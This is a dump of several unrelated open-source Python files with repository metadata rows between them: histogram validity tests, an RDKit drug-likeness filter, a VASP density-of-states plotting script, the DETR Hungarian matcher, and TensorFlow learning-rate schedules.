Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
axis_covariances=[
Covariance(0, 1, InterpretedInlineBuffer.fromarray(numpy.arange(1)))
],
)
h.checkvalid()
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(1000))),
axis_covariances=[
Covariance(0, 1, InterpretedInlineBuffer.fromarray(numpy.arange(1))),
Covariance(0, 2, InterpretedInlineBuffer.fromarray(numpy.arange(1))),
Covariance(1, 2, InterpretedInlineBuffer.fromarray(numpy.arange(1))),
],
)
h.checkvalid()
h = Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
[
Profile(
"",
Statistics(
[
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(10)), 1
),
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(10)), 2
),
]
),
),
Profile(
"",
Statistics(
[
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(10)), 1
),
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(10)), 2
),
]
),
),
],
profile_covariances=[
Covariance(0, 1, InterpretedInlineBuffer.fromarray(numpy.arange(1)))
],
)
h.checkvalid()
h = Ntuple(
[Column("one", Column.int32), Column("two", Column.int16)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
),
ColumnChunk(
[Page(RawInlineBuffer(b"\x03\x00"))], [0, 1]
),
]
)
]
)
],
column_covariances=[
Covariance(0, 1, InterpretedInlineBuffer.fromarray(numpy.arange(1)))
],
)
h.checkvalid()
h = Ntuple(
[Column("one", Column.int32), Column("two", Column.int16)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
),
ColumnChunk(
[Page(RawInlineBuffer(b"\x03\x00"))], [0, 1]
),
]
)
]
)
],
column_covariances=[
Covariance(
0,
1,
InterpretedInlineBuffer.fromarray(numpy.arange(1)),
weightpower=1,
),
Covariance(
0,
1,
InterpretedInlineBuffer.fromarray(numpy.arange(1)),
weightpower=0,
),
],
)
h.checkvalid()
def test_validity_Profile(self):
h = Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
[
Profile(
"",
Statistics(
[
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(10)), 1
),
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(10)), 2
),
]
),
)
],
)
h.checkvalid()
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
[
Profile(
"",
Statistics(
[
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(100)), 1
),
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(100)), 2
),
]
),
)
],
)
h.checkvalid()
def test_validity_Histogram(self):
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
)
h.checkvalid()
def test_validity_Parameter(self):
h = ParameterizedFunction(
"x**2",
[
Parameter("x", InterpretedInlineBuffer.fromarray(numpy.array([5]))),
Parameter("y", InterpretedInlineBuffer.fromarray(numpy.array([6]))),
],
)
h.checkvalid()
assert h.parameters[1].values.array.tolist() == [6]
def test_validity_ParameterizedFunction(self):
h = ParameterizedFunction("x**2")
h.checkvalid()
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
functions={
"f": ParameterizedFunction(
"x**2",
[
Parameter(
"x", InterpretedInlineBuffer.fromarray(numpy.arange(100))
)
],
)
},
)
h.checkvalid()
def test_validity_EvaluatedFunction(self):
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
functions={
"f": EvaluatedFunction(
InterpretedInlineBuffer.fromarray(numpy.arange(100))
)
},
)
h.checkvalid()
assert (
h.functions["f"].values.array.tolist()
== numpy.arange(100).reshape((10, 10)).tolist()
)
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
functions={
"f": EvaluatedFunction(
InterpretedInlineBuffer.fromarray(numpy.arange(100)),
InterpretedInlineBuffer.fromarray(numpy.arange(100)),
)
},
)
h.checkvalid()
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
functions={
"f": EvaluatedFunction(
InterpretedInlineBuffer.fromarray(numpy.arange(100)),
InterpretedInlineBuffer.fromarray(numpy.arange(100)),
[
Quantiles(
InterpretedInlineBuffer.fromarray(numpy.zeros(100)), 0.25
),
Quantiles(InterpretedInlineBuffer.fromarray(numpy.zeros(100))),
Quantiles(
InterpretedInlineBuffer.fromarray(numpy.zeros(100)), 0.75
),
],
)
},
)
h.checkvalid()
def test_validity_BinnedEvaluatedFunction(self):
h = BinnedEvaluatedFunction(
[Axis()],
InterpretedInlineBuffer(
numpy.array([0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0]
h = BinnedEvaluatedFunction(
[Axis(), Axis()],
InterpretedInlineBuffer(
numpy.array([[0.0]]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [[0.0]]
def test_validity_Page(self):
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
)
]
)
]
)
],
)
h.checkvalid()
assert h.instances[0].chunks[0].column_chunks[0].pages[0].array.tolist() == [5]
h = Ntuple(
[Column("one", Column.int32)],
[NtupleInstance([Chunk([ColumnChunk([], [0])])])],
)
h.checkvalid()
assert h.instances[0].chunks[0].column_chunks[0].array.tolist() == []
assert {n: x.tolist() for n, x in h.instances[0].chunks[0].arrays.items()} == {
"one": []
}
for arrays in h.instances[0].arrays:
pass
assert {n: x.tolist() for n, x in arrays.items()} == {"one": []}
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
)
]
)
]
)
],
)
h.checkvalid()
assert h.instances[0].chunks[0].column_chunks[0].array.tolist() == [5]
assert {n: x.tolist() for n, x in h.instances[0].chunks[0].arrays.items()} == {
"one": [5]
}
for arrays in h.instances[0].arrays:
pass
assert {n: x.tolist() for n, x in arrays.items()} == {"one": [5]}
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[
Page(RawInlineBuffer(b"\x05\x00\x00\x00")),
Page(
RawInlineBuffer(
b"\x04\x00\x00\x00\x03\x00\x00\x00"
)
),
],
[0, 1, 3],
)
]
)
]
)
],
)
h.checkvalid()
assert h.instances[0].chunks[0].column_chunks[0].array.tolist() == [5, 4, 3]
assert {n: x.tolist() for n, x in h.instances[0].chunks[0].arrays.items()} == {
"one": [5, 4, 3]
}
for arrays in h.instances[0].arrays:
pass
assert {n: x.tolist() for n, x in arrays.items()} == {"one": [5, 4, 3]}
def test_validity_Chunk(self):
h = Ntuple(
[Column("one", Column.float64)],
[NtupleInstance([Chunk([ColumnChunk([], [0])])])],
)
h.checkvalid()
h = Ntuple([Column("one", Column.int32)], [NtupleInstance([])])
h.checkvalid()
for arrays in h.instances[0].arrays:
assert False
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
)
]
)
]
)
],
)
h.checkvalid()
for arrays in h.instances[0].arrays:
pass
assert {n: x.tolist() for n, x in arrays.items()} == {"one": [5]}
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
)
]
),
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
)
]
),
]
)
],
)
h.checkvalid()
for arrays in h.instances[0].arrays:
assert {n: x.tolist() for n, x in arrays.items()} == {"one": [5]}
def test_validity_Column(self):
h = Ntuple(
[Column("one", Column.float64), Column("two", Column.int32)],
[NtupleInstance([])],
)
h.checkvalid()
h = Ntuple(
[Column("one", Column.int32), Column("two", Column.int16)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
),
ColumnChunk(
[Page(RawInlineBuffer(b"\x03\x00"))], [0, 1]
),
]
)
]
)
],
)
h.checkvalid()
for arrays in h.instances[0].arrays:
pass
assert {n: x.tolist() for n, x in arrays.items()} == {"one": [5], "two": [3]}
def test_validity_Ntuple(self):
h = Ntuple([Column("one", Column.float64)], [NtupleInstance([])])
h.checkvalid()
def test_validity_collection(self):
h = Collection()
h.checkvalid()
h = Collection(
{
"id": Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(30))
),
),
"id2": Histogram(
[Axis(RegularBinning(100, RealInterval(-5, 5)))],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(300))
),
),
},
axis=[Axis(RegularBinning(3, RealInterval(-1, 1)))],
)
h.checkvalid()
h = Collection(
{
"b": Collection(
{
"c": Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(60))
),
),
"d": Histogram(
[Axis(RegularBinning(100, RealInterval(-5, 5)))],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(600))
),
),
},
axis=[Axis(FractionBinning())],
)
},
axis=[Axis(RegularBinning(3, RealInterval(-1, 1)))],
)
h.checkvalid()
assert (
h.objects["b"].objects["c"].counts.counts.array.tolist()
== numpy.arange(60).reshape((3, 2, 10)).tolist()
)
| 34.796927 | 88 | 0.378683 |
794646029a4c1f751923da3acf7504bee09bafac | 3,268 | py | Python | smilesmerge/operators/filter/filter_classes/filter_children_classes/mozziconacci_filter.py | Jacob-Spiegel/SMILESMerge | 0f98a3a5739cab7e9bbae768d11c65420b5061c1 | [
"Apache-2.0"
] | 1 | 2021-06-29T14:09:43.000Z | 2021-06-29T14:09:43.000Z | smilesmerge/operators/filter/filter_classes/filter_children_classes/mozziconacci_filter.py | Jacob-Spiegel/SMILESMerge | 0f98a3a5739cab7e9bbae768d11c65420b5061c1 | [
"Apache-2.0"
] | null | null | null | smilesmerge/operators/filter/filter_classes/filter_children_classes/mozziconacci_filter.py | Jacob-Spiegel/SMILESMerge | 0f98a3a5739cab7e9bbae768d11c65420b5061c1 | [
"Apache-2.0"
] | 1 | 2021-06-29T14:09:48.000Z | 2021-06-29T14:09:48.000Z | """Mozziconacci Filter
This runs a Mozziconacci filter. Mozziconacci filter is a filter for
Drug-likeliness which filters molecules by the number of: rotatable bonds,
rings, oxygens, and halogens.
To pass the filter a molecule must be:
# of Rotatable bonds: Max 15
# of Rings: Max 6
# of Oxygens: Min 1
# of Nitrogens: Min 1
# of Halogens: Max 7
If you use the Mozziconacci Filter please cite: Mozziconacci, J. C. et al.
Preparation of a Molecular Database from a Set of 2 Million Compounds for
Virtual Screening Applications: Gathering, Structural Analysis and Filtering.
9th Electronic Computational Chemistry Conference, World Wide Web, March
(2003).
"""
import __future__
import rdkit
import rdkit.Chem as Chem
import rdkit.Chem.Lipinski as Lipinski
# Disable the unnecessary RDKit warnings
rdkit.RDLogger.DisableLog("rdApp.*")
from smilesmerge.operators.filter.filter_classes.parent_filter_class import ParentFilter
class MozziconacciFilter(ParentFilter):
"""
This runs a Mozziconacci filter. Mozziconacci filter is a filter for
Drug-likeliness which filters molecules by the number of:
To pass the filter a molecule must be:
# of Rotatable bonds: Max 15
# of Rings: Max 6
# of Oxygens: Min 1
# of Nitrogens: Min 1
# of Halogens: Max 7
If you use the Mozziconacci Filter please cite: Mozziconacci, J. C. et al.
Preparation of a Molecular Database from a Set of 2 Million Compounds for
Virtual Screening Applications: Gathering, Structural Analysis and
Filtering. 9th Electronic Computational Chemistry Conference, World Wide
Web, March (2003).
Inputs:
:param class ParentFilter: a parent class to initialize off
"""
def run_filter(self, mol):
"""
This runs a Mozziconacci filter. Mozziconacci filter is a filter for
Drug-likeliness which filters molecules by the number of:
To pass the filter a molecule must be:
# of Rotatable bonds: Max 15
# of Rings: Max 6
# of Oxygens: Min 1
# of Nitrogens: Min 1
# of Halogens: Max 7
Inputs:
:param rdkit.Chem.rdchem.Mol object mol: An rdkit mol object to be
tested if it passes the filters
Returns:
:returns: bool bool: True if the mol passes the filter; False if it
fails the filter
"""
halogen = Chem.MolFromSmarts("[*;#9,#17,#35,#53,#85]")
number_of_halogens = len(mol.GetSubstructMatches(halogen, maxMatches=8))
if number_of_halogens > 7:
return False
oxygen = Chem.MolFromSmarts("[#8]")
number_of_oxygens = len(mol.GetSubstructMatches(oxygen, maxMatches=2))
if number_of_oxygens < 1:
return False
nitrogen = Chem.MolFromSmarts("[#7]")
number_of_nitrogen = len(mol.GetSubstructMatches(nitrogen, maxMatches=2))
if number_of_nitrogen < 1:
return False
num_rotatable_bonds = Lipinski.NumRotatableBonds(mol)
if num_rotatable_bonds > 15:
return False
ring_count = Chem.rdmolops.GetSSSR(mol)
if ring_count > 6:
return False
# Passes everything
return True
| 32.68 | 88 | 0.672277 |
7946462b40a70c3060b0b5fde40a90580b5c0a98 | 6,408 | py | Python | DOS_process/plot_DOS_by_elements/Plot_PDOS_by_elements.py | bitsoal/auxiliary_scripts_for_vasp | 2c3e34d2cf062fd4cca4c31311db1a7c87e8812c | [
"MIT"
] | null | null | null | DOS_process/plot_DOS_by_elements/Plot_PDOS_by_elements.py | bitsoal/auxiliary_scripts_for_vasp | 2c3e34d2cf062fd4cca4c31311db1a7c87e8812c | [
"MIT"
] | null | null | null | DOS_process/plot_DOS_by_elements/Plot_PDOS_by_elements.py | bitsoal/auxiliary_scripts_for_vasp | 2c3e34d2cf062fd4cca4c31311db1a7c87e8812c | [
"MIT"
] | 2 | 2019-04-24T02:59:35.000Z | 2019-12-14T03:20:07.000Z |
# coding: utf-8
# In[1]:
from pymatgen.io.vasp.outputs import Vasprun
#from pymatgen.electronic_structure.plotter
from pymatgen.io.vasp.outputs import Orbital, Spin
from pymatgen import Structure
import numpy as np
import matplotlib.pyplot as plt
#%matplotlib inline
import os, glob
# In[2]:
def sum_pdos(pdos_obj, atom_ind_list, orbital_list, spin_list):
total_pdos = np.zeros(pdos_obj[0][Orbital.s][Spin.up].shape)
for atom_ind in atom_ind_list:
for orbital in orbital_list:
for spin in spin_list:
total_pdos = total_pdos + pdos_obj[atom_ind][orbital][spin]
return total_pdos
# In[3]:
def get_atom_ind_of_an_ele(ele_list, target_ele):
atom_ind_list = []
for atom_ind, ele in enumerate(ele_list):
if target_ele == ele:
atom_ind_list.append(atom_ind)
return atom_ind_list
# In[27]:
def save_pdos_data(tdos, spin_up_pdos_list, spin_down_pdos_list, projected_ele_list, ISPIN=2, wrt_fermi=True, *args, **argvs):
if wrt_fermi:
energies = tdos.energies - tdos.efermi
else:
energies = tdos.energies
spin_up_tdos = tdos.densities[Spin.up]
no_of_columns = 1 + len(projected_ele_list)
no_of_data_points = len(list(spin_up_tdos))
head_line = "#Energy\tTotal\t" + "\t".join(projected_ele_list) + "\n"
with open("pdos.dat", "w") as pdos_f:
pdos_f.write(head_line)
for data_point_ind in range(no_of_data_points):
line = "%f\t%f\t" % (energies[data_point_ind], spin_up_tdos[data_point_ind])
for spin_up_pdos in spin_up_pdos_list:
line += "%f\t" % spin_up_pdos[data_point_ind]
line += "\n"
pdos_f.write(line)
if ISPIN == 2:
pdos_f.write("\n")
spin_down_tdos = tdos.densities[Spin.down]
for data_point_ind in range(no_of_data_points):
line = "%f\t%f\t" % (energies[data_point_ind], spin_up_tdos[data_point_ind])
for spin_down_pdos in spin_down_pdos_list:
line += "%f\t" % spin_down_pdos[data_point_ind]
line += "\n"
pdos_f.write(line)
# In[30]:
def plot_pdos_by_ele(tdos, spin_up_pdos_list, spin_down_pdos_list, projected_ele_list, ISPIN=2, plot_tdos=False, wrt_fermi=True, energy_range_wrt_fermi=3, title=None):
if wrt_fermi:
energies = tdos.energies - tdos.efermi
valid_energy_ind = np.logical_and(energy_range_wrt_fermi[0]+0.1 <= energies, energies<=energy_range_wrt_fermi[1]-0.1)
energy_range = energy_range_wrt_fermi
else:
energies = tdos.energies
valid_energy_ind = np.logical_and(energy_range_wrt_fermi[0]+tdos.efermi+0.1 <= energies,
energies<=energy_range_wrt_fermi[1]+tdos.efermi-0.1)
energy_range = [energy_range_wrt_fermi[0] + tdos.efermi, energy_range_wrt_fermi[1] + tdos.efermi]
spin_up_max_y = max([np.max(pdos[valid_energy_ind]) for pdos in spin_up_pdos_list])
spin_down_max_y = 0
if ISPIN == 2:
spin_down_max_y = max([np.max(np.abs(pdos[valid_energy_ind])) for pdos in spin_down_pdos_list])
max_y = max([spin_up_max_y, spin_down_max_y])
spin_up_tdos = tdos.densities[Spin.up]
spin_up_tdos_max = np.max(spin_up_tdos[valid_energy_ind])
spin_down_tdos = np.zeros(spin_up_tdos.shape)
spin_down_tdos_max = 0
if ISPIN==2:
spin_down_tdos = -1*tdos.densities[Spin.down]
spin_down_tdos_max = np.max(np.abs(spin_down_tdos[valid_energy_ind]))
if plot_tdos:
max_y = max([max_y, spin_up_tdos_max, spin_down_tdos_max])
max_y *= 1.1
min_y = -max_y if ISPIN == 2 else 0
color_list = ["blue", "green", "red", "cyan", "magenta", "yellow", "purple", "orange"]
line_width = 0.5
plt.cla()
if plot_tdos:
plt.plot(energies, spin_up_tdos, label='Total', color="black", linewidth=line_width)
plt.plot(energies, spin_down_tdos, color="black", linewidth=line_width)
for ele_ind, ele in enumerate(projected_ele_list):
plt.plot(energies, spin_up_pdos_list[ele_ind], label=ele, color=color_list[ele_ind], linewidth=line_width)
if ISPIN == 2:
plt.plot(energies, spin_down_pdos_list[ele_ind], color=color_list[ele_ind], linewidth=line_width)
if wrt_fermi:
plt.plot([0, 0], [min_y, max_y], "--", color="brown", linewidth=line_width)
plt.xlim(energy_range_wrt_fermi)
else:
plt.plot([tdos.efermi, tdos.efermi], [min_y, max_y], "--", color="brown", linewidth=line_width)
plt.xlim([energy_range_wrt_fermi[0]+tdos.efermi, tdos.efermi+energy_range_wrt_fermi[1]])
plt.ylim([min_y, max_y])
plt.legend()
plt.xlabel("Energy (eV)")
plt.ylabel("Density of States (states/eV)")
if title != None:
plt.title(title)
plt.tick_params(axis='both', which='both', direction='in')
plt.savefig("pdos.png", format='png', dpi=500)
# In[31]:
if __name__ == "__main__":
projected_ele_list = ["Co", "N", "C", "H"]
plot_total = False
vasprun = Vasprun("vasprun.xml")
pdos = vasprun.pdos
tdos = vasprun.tdos
orbital_list = [Orbital.s, Orbital.px, Orbital.py, Orbital.pz, Orbital.dx2, Orbital.dxy, Orbital.dxz, Orbital.dyz, Orbital.dz2]
spin_up_list, spin_down_list = [], []
ISPIN = vasprun.incar["ISPIN"]
for ele in projected_ele_list:
atom_ind_list = get_atom_ind_of_an_ele(vasprun.atomic_symbols, ele)
spin_up_list.append(sum_pdos(pdos_obj=pdos, atom_ind_list=atom_ind_list, orbital_list=orbital_list, spin_list=[Spin.up]))
if ISPIN == 2:
spin_down_list.append(-1*sum_pdos(pdos_obj=pdos, atom_ind_list=atom_ind_list, orbital_list=orbital_list, spin_list=[Spin.down]))
input_arguments = {"tdos": tdos,
"spin_up_pdos_list": spin_up_list,
"spin_down_pdos_list": spin_down_list,
"projected_ele_list": projected_ele_list,
"ISPIN": 2,
"plot_tdos": True,
"wrt_fermi": True,
"energy_range_wrt_fermi": [-2, 2],
"title": "test"}
save_pdos_data(**input_arguments)
plot_pdos_by_ele(**input_arguments)
| 36.827586 | 167 | 0.640605 |
794646801215762abacb67363f18595932ef05c8 | 4,308 | py | Python | models/matcher.py | xieenze/detr | 13bdf0bf59fead571cd793a01eae50e7620fc6a2 | [
"Apache-2.0"
] | null | null | null | models/matcher.py | xieenze/detr | 13bdf0bf59fead571cd793a01eae50e7620fc6a2 | [
"Apache-2.0"
] | null | null | null | models/matcher.py | xieenze/detr | 13bdf0bf59fead571cd793a01eae50e7620fc6a2 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
"""
Modules to compute the matching cost and solve the corresponding LSAP.
"""
import torch
from scipy.optimize import linear_sum_assignment
from torch import nn
from util.box_ops import box_cxcywh_to_xyxy, generalized_box_iou
from IPython import embed
class HungarianMatcher(nn.Module):
"""This class computes an assignment between the targets and the predictions of the network
For efficiency reasons, the targets don't include the no_object. Because of this, in general,
there are more predictions than targets. In this case, we do a 1-to-1 matching of the best predictions,
while the others are un-matched (and thus treated as non-objects).
"""
def __init__(self, cost_class: float = 1, cost_bbox: float = 1, cost_giou: float = 1):
"""Creates the matcher
Params:
cost_class: This is the relative weight of the classification error in the matching cost
cost_bbox: This is the relative weight of the L1 error of the bounding box coordinates in the matching cost
cost_giou: This is the relative weight of the giou loss of the bounding box in the matching cost
"""
super().__init__()
self.cost_class = cost_class
self.cost_bbox = cost_bbox
self.cost_giou = cost_giou
assert cost_class != 0 or cost_bbox != 0 or cost_giou != 0, "all costs cant be 0"
@torch.no_grad()
def forward(self, outputs, targets):
""" Performs the matching
Params:
outputs: This is a dict that contains at least these entries:
"pred_logits": Tensor of dim [batch_size, num_queries, num_classes] with the classification logits
"pred_boxes": Tensor of dim [batch_size, num_queries, 4] with the predicted box coordinates
targets: This is a list of targets (len(targets) = batch_size), where each target is a dict containing:
"labels": Tensor of dim [num_target_boxes] (where num_target_boxes is the number of ground-truth
objects in the target) containing the class labels
"boxes": Tensor of dim [num_target_boxes, 4] containing the target box coordinates
Returns:
A list of size batch_size, containing tuples of (index_i, index_j) where:
- index_i is the indices of the selected predictions (in order)
- index_j is the indices of the corresponding selected targets (in order)
For each batch element, it holds:
len(index_i) = len(index_j) = min(num_queries, num_target_boxes)
"""
bs, num_queries = outputs["pred_logits"].shape[:2]
# We flatten to compute the cost matrices in a batch
out_prob = outputs["pred_logits"].flatten(0, 1).softmax(-1) # [batch_size * num_queries, num_classes]
out_bbox = outputs["pred_boxes"].flatten(0, 1) # [batch_size * num_queries, 4]
# Also concat the target labels and boxes
tgt_ids = torch.cat([v["labels"] for v in targets])
tgt_bbox = torch.cat([v["boxes"] for v in targets])
embed(header='matcher')
# Compute the classification cost. Contrary to the loss, we don't use the NLL,
# but approximate it in 1 - proba[target class].
# The 1 is a constant that doesn't change the matching, it can be ommitted.
cost_class = -out_prob[:, tgt_ids]
# Compute the L1 cost between boxes
cost_bbox = torch.cdist(out_bbox, tgt_bbox, p=1)
# Compute the giou cost betwen boxes
cost_giou = -generalized_box_iou(box_cxcywh_to_xyxy(out_bbox), box_cxcywh_to_xyxy(tgt_bbox))
# Final cost matrix
C = self.cost_bbox * cost_bbox + self.cost_class * cost_class + self.cost_giou * cost_giou
C = C.view(bs, num_queries, -1).cpu()
sizes = [len(v["boxes"]) for v in targets]
indices = [linear_sum_assignment(c[i]) for i, c in enumerate(C.split(sizes, -1))]
return [(torch.as_tensor(i, dtype=torch.int64), torch.as_tensor(j, dtype=torch.int64)) for i, j in indices]
def build_matcher(args):
return HungarianMatcher(cost_class=args.set_cost_class, cost_bbox=args.set_cost_bbox, cost_giou=args.set_cost_giou)
| 48.404494 | 119 | 0.672238 |
794647a6249abebec76f32cc14d0547932c3ec53 | 158 | py | Python | Operators_pro.py | iceboy07/Python_proj | 4565bfd148722731a6b87ffedc8b6473528a22bb | [
"MIT"
] | null | null | null | Operators_pro.py | iceboy07/Python_proj | 4565bfd148722731a6b87ffedc8b6473528a22bb | [
"MIT"
] | null | null | null | Operators_pro.py | iceboy07/Python_proj | 4565bfd148722731a6b87ffedc8b6473528a22bb | [
"MIT"
] | null | null | null | a=9
b=3
print("a=",a)
print("b=",b)
print("a + b=",a+b)
print("a - b=",a-b)
print("a * b=",a*b)
print("a / b=",a/b)
print("a % b=",a%b)
print("a pow b=",a**b) | 15.8 | 22 | 0.474684 |
794647ad77240580564b1e5059f66cc549053d99 | 557 | py | Python | ex-mundo2/ex060.py | PedroPegado/ex-cursoemvideo | 46751a7238e6a142b639c4cc3acf1759411732d7 | [
"MIT"
] | null | null | null | ex-mundo2/ex060.py | PedroPegado/ex-cursoemvideo | 46751a7238e6a142b639c4cc3acf1759411732d7 | [
"MIT"
] | null | null | null | ex-mundo2/ex060.py | PedroPegado/ex-cursoemvideo | 46751a7238e6a142b639c4cc3acf1759411732d7 | [
"MIT"
] | null | null | null | #import math
#x = int(input('Qual número deseja fatorar? '))
#f = math.factorial(x)
#print(f'O fatorial de {x} é {f}')
num = int(input('Qual número deseja fatorar? '))
c = num
f = 1
print(f'calculando {num}!',end=' = ')
while c > 0:
print(f'{c}', end='')
print(' x ' if c > 1 else ' = ', end='')
f *= c
c -= 1
print(f'{f}')
#num = int(input('Digite um numero: '))
#f = 1
#c = num
#while c > 0:
#print(f'{c}',end='')
#print(' x ' if c > 1 else ' = ',end='')
#f *= c
#c -= 1
#print(f'{num} em fatorial passa a ser: {f}!' )
| 19.892857 | 48 | 0.506284 |
794647d7dbdc01e29fcc2b5dd73e98f181109b05 | 3,075 | py | Python | train_utils/lr_schemes.py | maxdel/CipherGAN | 367be620d56a0cdc88a49bcdc5123d5bc5e6f122 | [
"MIT"
] | 131 | 2018-01-15T17:13:44.000Z | 2022-03-01T09:57:40.000Z | train_utils/lr_schemes.py | maxdel/CipherGAN | 367be620d56a0cdc88a49bcdc5123d5bc5e6f122 | [
"MIT"
] | 13 | 2018-06-01T12:40:24.000Z | 2022-02-09T23:26:52.000Z | train_utils/lr_schemes.py | maxdel/CipherGAN | 367be620d56a0cdc88a49bcdc5123d5bc5e6f122 | [
"MIT"
] | 29 | 2018-01-16T11:47:02.000Z | 2022-03-01T10:16:45.000Z | import tensorflow as tf
_LR = dict()
def register(name):
def add_to_dict(fn):
global _LR
_LR[name] = fn
return fn
return add_to_dict
def get_lr(params):
return _LR[params.lr_scheme](params)
@register("constant")
def constant(params):
return params.learning_rate
@register("exp")
def exponential_decay(params, delay=0):
gs = tf.contrib.framework.get_global_step() - delay
return tf.train.exponential_decay(
params.learning_rate,
gs,
params.learning_rate_decay_interval,
params.learning_rate_decay_rate,
staircase=params.staircased)
@register("lin")
def linear_decay(params, delay=0):
gs = tf.contrib.framework.get_global_step() - delay
return (params.learning_rate -
(tf.to_float(gs) /
(params.total_steps - delay)) * params.learning_rate)
@register("delay_exp")
def delayed_exponential_decay(params):
gs = tf.contrib.framework.get_global_step()
d = params.delay
return tf.cond(
tf.greater(gs, d), lambda: exponential_decay(params, delay=d),
lambda: params.learning_rate)
@register("delay_lin")
def delayed_linear_decay(params):
gs = tf.contrib.framework.get_global_step()
d = params.delay
return tf.cond(
tf.greater(gs, d), lambda: linear_decay(params, delay=d),
lambda: params.learning_rate)
@register("resnet")
def resnet(params):
gs = tf.contrib.framework.get_global_step()
return tf.cond(
tf.less(gs, 60000),
lambda: tf.minimum(0.1 / 10**((tf.to_float(gs) // 20000) - 1), 0.1),
lambda: 0.001)
@register("steps")
def stepped_lr(params):
gs = tf.contrib.framework.get_global_step()
lr = params.lr_values[-1]
for step, value in reversed(list(zip(params.lr_steps, params.lr_values))):
lr = tf.cond(tf.greater(gs, step), lambda: lr, lambda: value)
return lr
@register("warmup_linear_decay")
def warmup_linear_decay(params):
gs = tf.contrib.framework.get_global_step()
d = params.delay
warmup_steps = params.warmup_steps
inv_base = tf.exp(tf.log(0.01) / warmup_steps)
inv_decay = inv_base**(warmup_steps - tf.to_float(gs))
return tf.cond(
tf.greater(gs, warmup_steps), lambda: linear_decay(params, delay=d),
lambda: inv_decay * params.learning_rate)
@register("warmup_constant")
def warmup_constant(params):
gs = tf.contrib.framework.get_global_step()
d = params.delay
warmup_steps = params.warmup_steps
inv_base = tf.exp(tf.log(0.01) / warmup_steps)
inv_decay = inv_base**(warmup_steps - tf.to_float(gs))
return tf.cond(
tf.greater(gs, warmup_steps), lambda: constant(params),
lambda: inv_decay * params.learning_rate)
@register("warmup_exponential_decay")
def warmup_exponential_decay(params):
gs = tf.contrib.framework.get_global_step()
d = params.delay
warmup_steps = params.warmup_steps
inv_base = tf.exp(tf.log(0.01) / warmup_steps)
inv_decay = inv_base**(warmup_steps - tf.to_float(gs))
return tf.cond(
tf.greater(gs, warmup_steps), lambda: exponential_decay(params, delay=d),
lambda: inv_decay * params.learning_rate)
| 26.282051 | 79 | 0.708943 |
